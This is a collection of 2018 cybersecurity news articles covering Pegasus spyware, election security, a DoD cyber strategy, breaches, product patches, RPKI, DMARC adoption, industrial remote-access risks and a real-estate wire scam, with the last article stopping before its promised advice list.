Report Reveals Widespread Use of Pegasus Spyware
22.9.2018 securityweek
Virus

As part of a 2-year investigation into NSO Group’s sophisticated Pegasus spyware, Citizen Lab has identified 45 countries where operators might be leveraging the malware to conduct surveillance operations.

First detailed in August 2016, Pegasus is developed by NSO Group Technologies Ltd, a Herzelia, Israel-based company founded in 2010 and now owned by U.S. private equity firm Francisco Partners.

In 2016, Citizen Lab and Lookout revealed that Pegasus was targeting Apple devices using a chain of vulnerabilities referred to as Trident, which Apple was quick to patch. The installation process requires the intended victim to click on a specially crafted exploit link that delivers a chain of exploits that compromise the phone.

Once installed, the spyware contacts the command and control (C&C) server to receive and execute commands and to exfiltrate the target’s information, including passwords, contact lists, calendar events, text messages, and live voice calls from popular mobile messaging apps. It can also turn on the phone’s camera and microphone for recording purposes.

The modular, highly customizable software is sold exclusively to governments and law enforcement agencies, supposedly for fighting crime and terror, but was observed being abused for surveillance purposes.

An investigation Citizen Lab has conducted between August 2016 and August 2018 not only confirmed the use of Pegasus to target activists, journalists, and human rights fighters, but also painted a more detailed picture of how widespread the tool’s operators are.

The organization found 1,091 IP addresses that matched their fingerprint for Pegasus, as well as 1,014 domain names that pointed to those IPs. The investigation also revealed that at least 10 Pegasus operators (assumed to be NSO customers) might be actively engaged in cross-border surveillance.

“We developed and used Athena, a novel technique to cluster some of our matches into 36 distinct Pegasus systems, each one which appears to be run by a separate operator,” Citizen Lab notes in a report published on Tuesday, which also details the techniques used to fingerprint Pegasus and to investigate operators.

The organization found significant Pegasus operations in six countries previously “linked to abusive use of spyware to target civil society, including Bahrain, Kazakhstan, Mexico, Morocco, Saudi Arabia, and the United Arab Emirates.”

Furthermore, the spyware is apparently “in use by countries with dubious human rights records and histories of abusive behaviour by state security services.”

The countries with suspected Pegasus infections are Algeria, Bahrain, Bangladesh, Brazil, Canada, Cote d’Ivoire, Egypt, France, Greece, India, Iraq, Israel, Jordan, Kazakhstan, Kenya, Kuwait, Kyrgyzstan, Latvia, Lebanon, Libya, Mexico, Morocco, the Netherlands, Oman, Pakistan, Palestine, Poland, Qatar, Rwanda, Saudi Arabia, Singapore, South Africa, Switzerland, Tajikistan, Thailand, Togo, Tunisia, Turkey, the UAE, Uganda, the United Kingdom, the United States, Uzbekistan, Yemen, and Zambia.

Last year, the Pegasus spyware was found to have targeted dozens of Mexican lawyers, journalists, human rights defenders, opposition politicians, anti-corruption advocates, and an international investigation operating in Mexico. Even after the report, however, three separate operators continue to be active in the country as of July 2018. A lawsuit was filed in Tel Aviv in early September 2018.

Citizen Lab also identified at least six operators with significant operations in the Gulf Cooperation Council (GCC) countries in the Middle East: at least two focus on the UAE, one on Bahrain, and one on Saudi Arabia.

“Three operators may be conducting surveillance beyond the MENA region, including in Canada, France, Greece, the United Kingdom, and the United States,” Citizen Lab says.

The investigation also revealed five operators active in Africa: one predominantly focusing on the West African country of Togo, and one focused on Morocco (which may also spy on targets in Algeria, France, and Tunisia). There are also several operators in Israel: four operate domestically and one operating in other countries as well, including the Netherlands, Palestine, Qatar, Turkey, and the USA.

In their report, Citizen Lab provides further information on the identified operators focusing on specific regions, such as Americas, Africa, Asia, Europe, and the Middle East. Furthermore, the organization details a series of operators that appear to lack a clear focus, but all using a large degree of customization in their operations.

“Ten Pegasus operators appear to be conducting surveillance in multiple countries. While we have observed prior cases of cross-border targeting, this investigation suggests that cross-border targeting and/or monitoring is a relatively common practice. The scope of this activity suggests that government-exclusive spyware is widely used to conduct activities that may be illegal in the countries where the targets are located,” Citizen Lab notes.

Before publishing their report, Citizen Lab notified NSO of their findings, but the company once again said their “product is licensed to government and law enforcement agencies for the sole purpose of investigating and preventing crime and terror.” NSO also informed the organization of the existence of a Business Ethics Committee that includes outside experts, which reviews and approves each transaction, and which is authorized to reject or cancel agreements.

“We have seen no public details concerning the membership or deliberations of this committee but encourage NSO Group to disclose them. NSO’s statements about a Business Ethics Committee recall the example of Hacking Team’s ‘outside panel of technical experts and legal advisors … that reviews potential sales’,” Citizen Lab notes.

“There are multiple problems with Citizen Lab’s latest report. Most significantly, the list of countries in which NSO is alleged to sell or where our customers presumably operate the products is simply inaccurate. NSO does not sell its products in many of the countries listed. The product is only licensed to operate in countries approved under our Business Ethics Framework and the product will not operate outside of approved countries. As an example, the product is specifically designed to not operate in the USA,” NSO told Citizen Lab on Tuesday.

In 2016, however, Citizen Lab was able to infect a device in the United States with Pegasus spyware although the infection link had been sent to UAE activist Ahmed Mansoor.


Facebook Boosts Protections for Political Candidates
22.9.2018 securityweek
Social

Facebook this week revealed new tools that are aimed to defend users associated with US political campaigns ahead of the 2018 midterm elections.

The social platform, which has taken various steps towards protecting elections from abuse and exploitation on its platform, including the takedown of fake pages and accounts involved in political influence campaigns, is now launching new tools to defend candidates and campaign staff.

Both hackers and foreign adversaries might be particularly interested in targeting Facebook users who are associated with political campaigns, Facebook says.

The social network already has in place a series of security tools and procedures to stay ahead of bad actors who attempt to use Facebook to disrupt elections, and a newly announced pilot program is meant to complement those.

The new pilot program is open for candidates for federal or statewide office, as well as for staff members and representatives from federal and state political party committees, Facebook announced. The additional security protections can be added both to Pages and to accounts.

To apply for the program, Page admins should head to politics.fb.com/campaignsecurity. Once enrolled, they will be able to add others from their campaign or committee.

“We’ll help officials adopt our strongest account security protections, like two-factor authentication, and monitor for potential hacking threats,” Facebook says.

The program, the social platform claims, can help it detect any targeting that does happen, while also allowing candidates to quickly report such abuses. Once an attack against one campaign official has been detected, the platform can review and protect other enrolled accounts that are affiliated with that same campaign.

Facebook also says it shares relevant information with law enforcement and other companies to increase effectiveness. Additionally, the social network is assessing how the pilot program and other security tools “might be expanded to future elections and other users, such as government officials.”

“Although this is a pilot program, it’s one of several steps we’re taking ahead of the US midterm elections to better secure Facebook, including detecting and removing fake accounts, working to prevent the spread of false news, and setting a new standard for political and issue ads transparency,” the platform concludes.


Department of Defense Releases New Cyber Strategy
22.9.2018 securityweek
BigBrothers

The U.S. Department of Defense this week released its 2018 cyber strategy, which outlines how the organization plans on implementing the country’s national security and defense strategies in cyberspace.

The new cyber strategy, which supersedes the 2015 strategy, focuses on the competition with China and Russia, but it also mentions other actors, such as North Korea and Iran. The DoD says China has been “eroding U.S. military overmatch and the Nation’s economic vitality” by stealing information, while Russia has used cyber operations to influence elections.

“The Department must take action in cyberspace during day-to-day competition to preserve U.S. military advantages and to defend U.S. interests. Our focus will be on the States that can pose strategic threats to U.S. prosperity and security, particularly China and Russia,” the Pentagon wrote in a summary of the new cyber strategy.

“We will conduct cyberspace operations to collect intelligence and prepare military cyber capabilities to be used in the event of crisis or conflict. We will defend forward to disrupt or halt malicious cyber activity at its source, including activity that falls below the level of armed conflict. We will strengthen the security and resilience of networks and systems that contribute to current and future U.S. military advantages,” it added.

The DoD wants cyber forces to be prepared to assist air, land, sea and space forces during wartime to gain military advantage over its adversaries, which the Pentagon says are also increasingly reliant on computers.

One of the Department’s goals is to ensure that the U.S. can “fight and win wars” in cyberspace while being able to defend its own systems. Another objective is to prevent, defeat and deter malicious cyber activities aimed at critical infrastructure. Finally, the Pentagon wants to work with allies and partners to strengthen its cyber capabilities, expand cyber operations, and enhance information sharing.

As for its strategic approach, the DoD wants to “build a more lethal force, compete and deter in cyberspace, expand alliances and partnerships, reform the Department, and cultivate talent.”

The creation of “more lethal force” includes accelerating the development of cyber capabilities for warfighting and counterattacks, leveraging automation and data analysis to improve effectiveness, employing off-the-shelf capabilities in addition to its own, and moving from what it calls a “zero defect” culture to one that fosters agility and innovation.

The Pentagon hopes to deter adversaries by securing its own systems and critical infrastructure, but if that fails it wants to be ready to “employ the full range of military capabilities in response.”

The DoD has recently conducted its first ever cyber posture review, as directed by the National Defense Authorization Act. The results of the review are classified, but a factsheet made public by the organization reveals that the DoD must “continue investments in people, capabilities, and processes to meet fully the objectives set forth in the Strategy.”


China Arrests Suspect for Customer Data Leak at Accor Partner
22.9.2018 securityweek
Crime

Shanghai police have arrested a man in connection with a data leak at NASDAQ-listed Chinese hotelier Huazhu Group after the suspect failed to sell the information online.

The 30-year-old suspect had hacked and stolen user data from hotels under Huazhu Group and tried to sell it on overseas websites, the police said in a statement late Wednesday.

Huazhu, one of China's biggest hoteliers and the local partner of France-based AccorHotels, had alerted police to reports in August that the company's internal data was being sold online.

Huazhu Group said in a statement to the New York stock exchange on Monday that "the suspect also attempted to blackmail Huazhu by leveraging public pressure, without success".

The potentially-leaked data included guest membership information, personal IDs, check-in records, guest names, mobile numbers and emails.

Shanghai police said the case is under further investigation.

Huazhu operates more than 3,000 hotels in more than 370 cities in China, including the AccorHotels brands Ibis and Mercure.

The sale of personal information is common in China, which last year implemented a controversial cybersecurity law that requires services to store user data in China and receive approval from users before sharing their details.

Before Huazhu formed a long-term alliance with Accor in 2014 to help the French hotel group develop the Chinese market, it experienced another user data leak.

Xinhua reported check-in records from Huazhu and other hoteliers were stored by third parties and leaked in late 2013 due to management system loopholes.

Chinese e-commerce giant Alibaba came under fire earlier this year over its handling of user data in an episode that underscores growing concerns for privacy in the hyper-digitised country.


Japan Digital Currency Exchange Hacked, Losing $60 Million
22.9.2018 securityweek
Cryptocurrency

TOKYO (AP) — Hackers have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies from a Japanese digital currency exchange, the operators said Thursday.

Tech Bureau Corp. said a server for its Zaif exchange was hacked for two hours last week, and some digital currencies got unlawfully relayed from what's called a "hot wallet," or where virtual coins are stored at such exchanges.

The exchange was taken offline until details of the damage could be confirmed, and efforts were underway to get it back working, Tech Bureau said.

Japan has been bullish on virtual money and has set up a system requiring exchanges to be licensed to help protect consumers. The system is also meant to make Japan a global leader in the technology. Bitcoin has been a legal form of payment in Japan since April 2017, and a handful of major retailers here already accept bitcoin payments.

But the recurrence of cryptocurrency heists shows problems persist.

Earlier this year, the Tokyo-based exchange Coincheck reported a 58 billion yen ($547 million) loss of a cryptocurrency called NEM from suspected criminal hacking.

Coincheck, in operation since 2012, had been applying for a government license but had not yet gotten one. That led to industry-wide soul-searching, led by government financial regulators, to prevent such problems.

Zaif got registered with the government last year.

The company said Thursday it had accepted a 5 billion yen ($45 million) offer from Fisco, a Tokyo-based investment company, for a majority stake in Tech Bureau, headquartered in Osaka.

The cryptocurrencies stolen in last week's hack included Bitcoin and Monacoin. Of the stolen money, 2.2 billion yen ($20 million) belonged to the company, and the rest were customers' assets, according to Tech Bureau.

Earlier this year, a glitch at Zaif allowed some people to buy cryptocurrencies for zero yen.


FBI Warns of Cyber-Thieves Targeting Payroll Accounts
22.9.2018 securityweek
BigBrothers

Cybercriminals are targeting the online payroll accounts of employees in a variety of industries to divert funds, the Federal Bureau of Investigation (FBI) warns.

According to an alert from the FBI’s Internet Complaint Center (IC3), numerous such attacks have been already reported, with education, healthcare, and commercial airway transportation being the most impacted industries.

The preferred attack method is phishing, which allows cybercriminals to capture an employee’s login credentials. Armed with this information, the cybercriminals then access the employee’s payroll account and swiftly change their bank account information.

The cyber-thieves also add rules to the employees’ payroll accounts to ensure that they do not receive alerts regarding direct deposit changes. Next, the attackers change direct deposits and redirect them to accounts they control.

Payroll diversion, the FBI says, can be mitigated through educating employees about the scheme and through informing them on preventative strategies and appropriate reactive measures they should take once a breach has occurred.

“Instruct employees to hover their cursor over hyperlinks included in emails they receive to view the actual URL. Ensure the URL is actually related to or associated with the company it purports to be from,” the FBI says.

Phishing relying on URLs is successful due to the use of links that closely resemble those of websites owned by the organizations they purport to be from, but instead take the victim to pages controlled by the attackers.

The FBI also notes that instructing employees to not provide log-in credentials or personally identifying information in response to any email should mitigate phishing risks as well. Employees should also be taught to forward any suspicious requests for personal information to the information technology or human resources department.

Organizations should also ensure that the credentials used for payroll purposes are different from those used for other purposes. Heightened scrutiny to bank information initiated by employees when looking to update or change direct deposit credentials and monitoring employee logins that occur outside normal business hours should also mitigate the risks associated with payroll diversion.

Furthermore, organizations are advised to restrict access to the Internet on systems handling sensitive information and to consider adopting two-factor authentication for access to sensitive systems and information. Allowing only required processes to run on systems handling sensitive information is yet another mitigating factor.


Rapid7 Adds Automation, Orchestration Capabilities to Insight Platform
22.9.2018 securityweek
IT

Rapid7 announced on Thursday that its Insight Platform now features automation and orchestration capabilities through a new tool called InsightConnect.

The new capabilities, which Rapid7 obtained following the acquisition of security automation and orchestration provider Komand in July 2017, should help security, development and IT teams reduce manual workloads and streamline their tasks.

Rapid7 says there are many potential use cases for InsightConnect. For instance, teams can connect their existing tools using a library of more than 200 plugins. The vulnerability patching process can also be improved through orchestration, and so can threat detection, containment and response processes by connecting threat detection to containment tasks.

Rapid7 improves Insight Platform

The new capabilities can also make it easier for IT teams to address threats, vulnerabilities and misconfigurations by automatically creating service tickets.

Rapid7’s Insight Platform has several components, including for vulnerability management (InsightVM), secure application development (InsightAppSec), phishing (InsightPhish), incident detection and response (InsightIDR), and operational control centers (InsightOps).

The company announced that InsightVM and InsightIDR will soon include pre-built automation functionality that will enable organizations to implement automation and orchestration processes for vulnerability remediation, threat containment and other tasks.

“Technology is being deployed faster than organizations can secure it, and that has placed an enormous burden on security, IT, and development teams that are often understaffed and overwhelmed by the sheer volume of manual work that needs to get done,” said Lee Weiner, chief product officer at Rapid7. “We believe automation and orchestration capabilities are vital for these teams, and will allow them to be more strategic and effective in securing their environments.”

InsightConnect and the new automation features for InsightVM and InsightIDR will be available in the U.S. starting October 1. They are expected to become available globally throughout the rest of 2018 and into 2019.


Cisco Patches Code Execution in Webex Player
22.9.2018 securityweek
Vulnerebility

Cisco this week addressed vulnerabilities in the Webex Network Recording Player for Advanced Recording Format (ARF) that could allow a remote attacker to execute arbitrary code on a targeted system.

The Webex Meetings Server is a multimedia conferencing solution that can be hosted on a customer’s private cloud and which manages and maintains the Webex Meetings Suite services and Webex Meetings Online hosted multimedia conferencing solutions.

The Meetings services can record meetings, with the recordings stored online or downloadable in ARF format. The meetings can also be recorded directly on a local computer, in WRF format.

The Network Recording Player can be installed either automatically when a user accesses a recording file hosted on a Webex Meetings Suite site or manually from the Webex site.

Improper validation of Webex recording files, however, was found to lead to vulnerabilities that an unauthenticated, remote attacker can exploit.

For exploitation purposes, the attacker would need to send a link or email attachment containing a malicious file to the victim and trick them into opening the file in the Cisco Webex Player.

The bugs, Cisco explains in an advisory, impact ARF recording players available from Meetings Suite (WBS32) - Player versions prior to WBS32.15.10; Meetings Suite (WBS33) - Player versions prior to WBS33.3; Webex Meetings Online - Player versions prior to 1.3.37; and Webex Meetings Server - Player versions prior to 3.0MR2.

The issues are tracked as CVE-2018-15414, CVE-2018-15421, and CVE-2018-15422. The Windows, OS X, and Linux versions of the Webex Network Recording Players are impacted by at least one of the flaws, Cisco reveals.

The Network Recording Player updates that resolve the vulnerabilities include Meetings Suite (WBS32) - Player versions WBS32.15.10 and later and Meetings Suite (WBS33) - Player versions WBS33.3 and later; Meetings Online - Player versions 1.3.37 and later; and Meetings Server - Player versions 3.0MR2 and later.

According to Cisco, there are no known workarounds for these vulnerabilities. However, users can remove the affected Network Recording Player and Webex Player by following the uninstall procedure for their respective operating systems.

“The Cisco Webex Network Recording Player (for .arf files) will be automatically upgraded to the latest, non-vulnerable version when users access a recording file that is hosted on a Cisco Webex Meetings site that contains the versions previously specified,” Cisco explains.


Embrace RPKI to Secure BGP Routing, Cloudflare Says
22.9.2018 securityweek
Safety

BGP (Border Gateway Protocol) routing isn’t secure and organizations should embrace Resource Public Key Infrastructure (RPKI) to improve security, Cloudflare says.

Border Gateway Protocol was designed to control the route of data across the Internet. The state of BGP route validation, the website protection company argues, hasn’t seen improvements, thus leading to route leaks and hijacks.

As part of BGP hijacking, attackers take over IP address groups by corrupting the routing tables that store the path to a network.

RPKI, “a cryptographic method of signing records that associate a BGP route announcement with the correct originating AS number,” can improve BGP routing-security globally, but only if it would enjoy broad adoption, such as being deployed by multiple major network operators, Cloudflare claims.

Around 8.7% of the IPv4 Internet routes are currently signed with RPKI, yet only 0.5% of all the networks apply strict RPKI validation, statistics reveal.

Although there are protections in place to manage which network can announce which route and to allow one network to filter another network’s routes, route leaks and hijacks do happen, with the most recent of them involving a Russian ISP rerouting traffic from major tech firms, and the BGP hijack of payment processors.

Although the Internet Routing Registry (IRR) system provides a method to manage the routes, a network can announce, it doesn’t cryptographically sign its data, and the IRR databases contain plenty of invalid data, Cloudflare says. RPKI can secure the route origin and represents a first step in improving the BGP route security.

“Records exist within IRRs that are both clearly wrong and/or are clearly missing. There’s no cryptographic signing of records. There are multiple suppliers of IRR data; some better than others,” Cloudflare’s Martin J Levy points out.

Both IRR and RPKI use third-party entities to hold the database information, but, with the latter, the same entity that allocated or assigned a numeric resource (like an IP address or ASN) also holds the TA (Trust Anchor – same as Certificate Authority for web certificates) used to validate the ROA’s (Route Origin Authorization) record.

Today, there are five Regional Internet Registries (RIR) (Afrinic for Africa; APNIC for Asia-Pacific; ARIN for North America; LACNIC for Central and South America; and RIPE for Europe, Middle-East and Russia) and they are the TAs for RPKI.

“The present day RPKI systems operate in conjunction with existing RIR login credentials. Once you can login to a portal and control your IP allocations and ASN allocations; then you can also create, edit, modify, and delete RPKI data in the forms of ROAs. This is the basis of how RPKI separates itself from the IRR. You can only sign your own resources. You can’t just randomly create data. If you lose your RIR allocation, then you lose the RPKI data,” Levy explains.

The issues that arise from this setup include the fact that any ISP with an allocation needs to keep its RIR membership up to date and that the international law plays a role in any dispute between the ISP and RIR, as they might be entities based in different countries.

Despite the obvious benefits, RPKI has seen low adoption, even RIRs are supporting RPKI for their members. One issue would be the limited toolset for successfully operating a network with RPKI enabled route filtering.

According to Levy, IXP (Internet Exchange Points) are noticing that filtering using RPKI is a valid option for their route-servers and a handful of networks are signing IP routes and verifying IP routes via RPKI, which represents a step forward, although a small one.

“RPKI is not a bullet-proof solution to securing all routing on the Internet, however it represents the first milestone in moving from trust based to authentication based routing. Our intention is to demonstrate that it can be done simply and cost efficiently. We are inviting operators of critical Internet infrastructure to follow us in a large scale deployment,” Cloudflare’s Jérôme Fleury and Louis Poinsignon note in a blog post.


U.S. Takes Off the Gloves in Global Cyber Wars: Top Oficials
22.9.2018 securityweek
CyberWar

The United States is taking off the gloves in the growing, shadowy cyber war waged with China, Russia and other rivals, a top White House official said Thursday.

National Security Advisor John Bolton said the country's "first fully articulated cyber strategy in 15 years" was now in effect.

The new more aggressive posture follows a decision by President Donald Trump to revoke rules established by his predecessor Barack Obama to require high-level authority for any big military cyber operations.

"Our hands are not tied as they were in the Obama administration," Bolton said.

"For any nation that's taking cyber activity against the United States, they should expect… we will respond offensively, as well as defensively," Bolton said.

"Not every response to a cyber attack would be in the cyber world," he added.

Bolton referred to China, Iran, North Korea and Russia as major sources of threats, saying "Americans and our allies are under attack every day in cyberspace."

Hostile intrusions target everything from US infrastructure to government bureaucracies, businesses and elections, according to Bolton.

Among the most notorious incidents is the hacking, allegedly by Russian military agents, of Democrat figures' email accounts just before the 2016 elections, in which Republican Trump took a surprise win against the heavily favored Hillary Clinton.

- Multi-pronged offense -

On the defensive side, US efforts will include "network hardening" and improved cyber security, the Pentagon said.

But the new strategy of what the Pentagon called "countering, disrupting, degrading and deterring" attacks emphasizes much more than better firewalls.

US Treasury Secretary Steven Mnuchin said that the department "has used its cyber sanctions authorities to impose costs on Russia, North Korea, Iran and others for a wide range of behavior."

And Secretary of Homeland Security Kirstjen Nielsen said that the domestic security department would push "for electronic surveillance and computer crime laws to be updated to keep pace with the rapidly evolving environment."

"Transnational criminal groups are employing increasingly sophisticated digital tools and techniques," she said.

The State Department, meanwhile, focused on what it said would be increased efforts to build up internet security in allied countries "because of the interconnected nature of cyberspace."

"When our partners improve their cyber security practices, it ultimately makes other states, including the United States, safer and more resilient against cyber threats," the State Department said.


Rockwell Automation Patches Severe Flaws in Communications Software
22.9.2018 securityweek
Vulnerebility

Rockwell Automation has patched several critical and high severity vulnerabilities in its RSLinx Classic communications software.

RSLinx Classic is a widely used piece of software that allows organizations to connect Logix5000 programmable automation controllers to various Rockwell applications, including for data acquisition, programming, HMI interaction, and configuration apps. The product is used worldwide, mainly in the energy, critical manufacturing, and water and wastewater systems sectors.

According to advisories published recently by ICS-CERT and Rockwell Automation itself, researchers from Tenable and Nozomi discovered that RSLinx Classic is affected by three vulnerabilities that can allow malicious actors to launch denial-of-service (DoS) attacks, and possibly even execute arbitrary code.

The most serious of the flaws is CVE-2018-14829, a stack-based buffer overflow that has been assigned a CVSS score of 10. A remote attacker can cause the application to crash by sending specially crafted CIP packets on port 44818. Triggering the buffer overflow can also lead to remote code execution, Rockwell and ICS-CERT warned.

Another severe vulnerability is CVE-2018-14827, which has a CVSS score of 8.6 and allows a remote and unauthenticated attacker to crash the application by sending specially crafted Ethernet/IP packets to the aforementioned port. Rockwell noted that the software must be restarted by the user following a successful exploit.

The last vulnerability, also classified as high severity, with a CVSS score of 7.5, is a heap-based buffer overflow tracked as CVE-2018-14821. This security bug also allows a remote and unauthenticated attacker to crash the software using malicious CIP packets.

The flaws affect RSLinx Classic 4.00.01 and prior. Patches have been released by the vendor for each impacted version.

Users can also protect themselves against potential attacks by disabling port 44818, which is only needed in certain scenarios.

These are not the only serious vulnerabilities patched recently by Rockwell Automation in RSLinx Classic. A few months ago, the company and ICS-CERT informed users of a high severity privilege escalation issue that also affected the FactoryTalk Linx Gateway product.


DMARC Fully Implemented on Two Thirds of U.S. Government Domains
22.9.2018 securityweek
Safety

DMARC has been fully implemented on roughly two thirds of U.S. government domains, but agencies have less than a month to roll out the email security standard on the remaining websites.

The Binding Operational Directive (BOD) 18-01, issued by the DHS in October 2017, instructs all federal agencies to start using web and email security technologies such as HTTPS, STARTTLS, SPF and DMARC.

DMARC (Domain-based Message Authentication, Reporting and Conformance) is an email authentication, policy, and reporting protocol designed to detect and prevent email spoofing. Organizations can set the DMARC policy to “none” to only monitor unauthenticated emails, “quarantine” to send them to the spam or junk folder, or “reject” to completely block their delivery.

The DHS has instructed federal agencies to fully implement DMARC (i.e. set their DMARC policy to “reject”) on all .gov domains by October 16, 2018.

Email threat protection company Agari has been monitoring progress and, according to its latest report, as of September 14, DMARC had been fully implemented on 64% of 1,144 domains. DMARC has been rolled out with at least a “none” policy on 83% of domains.

“This is significantly better adoption than the commercial sector, where two-thirds (67%) of the Fortune 500 have not published any DMARC policy,” Agari said in its report.

DMARC implementation by federal agencies

The government organizations that have implemented a “reject” policy on less than half of their domains include the Consumer Financial Protection Bureau, the Department of Commerce, the Department of Energy, and the Executive Office of the President.

The security firm pointed out that of the 417 executive branch domains that have not implemented a “reject” policy, 89% are actively sending emails, which could hamper compliance efforts.

“With less than one month until the final BOD 18-01 deadline, the U.S. Government has made tremendous strides forward in its DMARC adoption and compliance efforts. Most federal agencies and the citizens they serve are now realizing the benefits of DMARC,” Agari said. “Executive branch agencies such as the Department of Health and Human Services have implemented a ‘p=reject’ policy across hundreds of domains to automatically block phishing email attacks and prevent domain spoofing. Yet hundreds of other federal domains still remain vulnerable to these attacks.”

Proofpoint has also recently published a report on DMARC adoption and compliance with BOD 18-01, but the company also took into account the implementation of the Sender Policy Framework (SPF), which along with DomainKeys Identified Mail (DKIM) forms the foundation of DMARC. Proofpoint analyzed the full set of federal civilian domains provided by the federal government, which includes 200 additional domains compared to what Agari has been monitoring.

Data from Proofpoint shows that nearly 52% of all domains have both a valid SPF record and the DMARC policy set to “reject.” However, only 34 of the 133 agencies under the BOD mandate, representing roughly 24%, were fully compliant at the time of the study.

DMARC implementation by federal agencies


Facebook Building a 'War Room' to Battle Election Meddling
22.9.2018 securityweek
Social

Facebook on Wednesday said it will have a "war room" up and running on its Silicon Valley campus to quickly repel efforts to use the social network to meddle in upcoming elections.

"We are setting up a war room in Menlo Park for the Brazil and US elections," Facebook elections and civic engagement director Samidh Chakrabarti said during a conference call.

"It is going to serve as a command center so we can make real-time decisions as needed."

He declined to say when the "war room" -- currently a conference room with a paper sign taped to the door -- would be in operation.

Teams at Facebook have been honing responses to potential scenarios such as floods of bogus news or campaigns to trick people into falsely thinking they can cast ballots by text message, according to executives.

"Preventing election interference on Facebook has been one of the biggest cross-team efforts the company has seen," Chakrabarti said.

The conference call was the latest briefing by Facebook regarding efforts to prevent the kinds of voter manipulation or outright deception that took place ahead of the 2016 election the brought US President Donald Trump to office.

Facebook is better prepared to defend against efforts to manipulate the platform to influence elections and has recently thwarted foreign influence campaigns targeting several countries, chief executive Mark Zuckerberg said last week in a post on the social network.

"We've identified and removed fake accounts ahead of elections in France, Germany, Alabama, Mexico and Brazil," Zuckerberg said.

- 'Better prepared' for attacks -

"We've found and taken down foreign influence campaigns from Russia and Iran attempting to interfere in the US, UK, Middle East, and elsewhere -- as well as groups in Mexico and Brazil that have been active in their own country."

Zuckerberg repeated his admission that Facebook was ill-prepared for the vast influence efforts on social media in the 2016 US election but added that "today, Facebook is better prepared for these kinds of attacks."

Facebook has started showing who is behind election-related online ads, and have shut down accounts involved in coordinated stealth influence campaigns.

With the help of artificial intelligence software, Facebook blocked nearly 1.3 billion fake accounts between March and October of last year, according to Chakrabarti.

"We are working hard to amplify the good and mitigate the bad," news feed director Greg Marra said on the call.

As elections near, Facebook will also encourage civic involvement and voter registration, according to global politics and government outreach director Katie Harbath.

Facebook has partnered with non-profit organizations to bolster election integrity efforts outside the US and has been meeting with other technology companies to coordinate sharing information about election meddling efforts spanning social media platforms, according to Harbath.

Facebook said it has also started working with political campaigns to improve staff online security practices, such as requiring more than just a password to access an account.


Legitimate RATs Pose Serious Risk to Industrial Systems
22.9.2018 securityweek
Virus

Remote administration tools (RATs) installed for legitimate purposes in operational technology (OT) networks can pose a serious security risk, allowing malicious actors to abuse them in attacks aimed at industrial organizations, Kaspersky Lab warns.

A report published on Friday by the security firm reveals that, on average, in the first half of 2018, legitimate RATs were found on more than two-thirds of computers used for industrial control systems (ICS).

The highest percentage of ICS computers with RATs were found in Kazakhstan, where over half of all analyzed systems had a remote admin tool installed. In the United States, 29% of the devices monitored by Kaspersky had a legitimate RAT. It’s worth noting that this does not include the remote desktop tool found by default in Windows.

Industrial organizations may use RATs to control or monitor HMIs or SCADA systems from a workstation, to connect multiple operators to one workstation, or connect computers on the corporate network to devices on the OT network.

“Some of [these scenarios] indicate that the use of RATs on the OT network can be explained by operational requirements, which means that giving up the use of RATs would unavoidably entail modifications to work processes,” Kaspersky researchers said.

In 18% of cases observed by the security firm, legitimate RATs were installed as part of the ICS software distribution package, while the rest were specifically installed by employees or suppliers. There are also cases where attackers stealthily install RATs to gain access to the targeted organization’s systems.

Legitimately installed tools can introduce serious security risks as they often require elevated privileges, they don’t support two-factor authentication, they don’t restrict local access, they are impacted by vulnerabilities, and they make use of relay servers to bypass security restrictions applied to the network perimeter.

“The most critical RAT-related problem is the use of elevated privileges and the absence of any means to limit these privileges (or to restrict a remote user’s local access). In practice, this means that if attackers (or malware) gain access to a remote user’s computer, steal authentication data (login/password), hijack an active remote administration session or successfully attack a vulnerability in the RAT’s server part, they will gain unrestricted control of the ICS system. By using relay servers for reverse connections, attackers can also connect to these RATs from anywhere in the world,” researchers explained.

Register for SecurityWeek’s 2018 ICS Cyber Security Conference

Another problem with the use of RATs is that they make it very difficult for security services and teams to distinguish legitimate activity from malicious activity.

Kaspersky has seen several attacks where malicious actors had installed tools such as TeamViewer or Remote Manipulator System (RMS). However, in the case of a car manufacturer, experts noticed that hackers had abused a tool installed for legitimate purposes after obtaining its access credentials.

“The ability to manipulate the ICS remotely significantly reduces maintenance costs, but at the same time, uncontrolled remote access, the inability to provide 100% verification of the remote client’s legitimacy, and the vulnerabilities in RAT code and configuration significantly increase the attack surface. At the same time, RATs, along with other legitimate tools, are increasingly used by attackers to mask malicious activity and make attribution more difficult,” Kaspersky said.


Homebuyers Being Targeted by Money Transfer Scam
21.9.2018 securityaffairs
Spam

Money Transfer Scam – Scammers hack the victims’s email accounts, monitor conversations between the buyers and title agents, send instructions on where to wire the money.
A new homebuyer moves through a period of vulnerable transition as they invest in their future. This sensitive stage — a confusing flurry of representatives, documentation and planning — represents an attractive target for con artists with ill intentions. Some choose to capitalize on homebuyers’ ignorance.

The con in question is a money transfer scam with all the likeness of a typical transaction. Scammers hack the email accounts of their victims and monitor conversations between the buyers and title agents. Toward the close of the interaction, the scammers will send false instructions on where to wire the money.

After the wrongfully transferred money reaches the criminals behind the money transfer scam, they disappear, thousands of dollars wealthier. The practice is so whisper-quiet and challenging to catch that it’s given the FBI considerable trouble. For all intents and purposes, the scammers appear real.

Bryan O’Meara was hoping to expand his business with the addition of a parking lot for his new restaurant. He intended to wire upward of $1 million to the seller of the property but was unaware that his conversations were under surveillance by scammers. His business partner was equally unaware.

Fortunately for O’Meara, he didn’t follow through with the transaction — a decision that saved him an enormous sum of money. A loss of that caliber might have upended his business, and it’s a risk that many moving forward in real estate transactions should consider.

money transfer scam
Image by Soumil Kumar

FBI Involvement
The Federal Bureau of Investigation has offered the American public advice on how to better safeguard their money from scammers and hackers. After reporting $5 million in loss from Utah residents in 2017, every citizen is encouraged to take preventive measures to protect themselves from scams.

These measures include a frequent change in passwords, using mismatched and uncommon characters to avoid predictability. They also include a final follow-up with your partner or agent to confirm the wiring instructions are correct. Finally, in a worst-case scenario, people should contact their bank for immediate recall.

It’s an unfortunate truth that, even in the event of a recall, the victim loses most of their stolen money. Scammers will often bounce-wire the money through several international accounts at a high pace, blurring the trail that’s left behind in the event their target tries to reverse their transaction.

No security is 100 percent reliable. Even in following all the steps and taking every precaution, scammers and hackers will always innovate new techniques to steal money from their unwitting victims.

Protecting Home Purchases
While the FBI is a helpful resource when combating scammers, homebuyers are encouraged to take additional measures before they purchase their property of interest. For many, changing a password and making a phone call will not be enough. They should also consider the following advice.

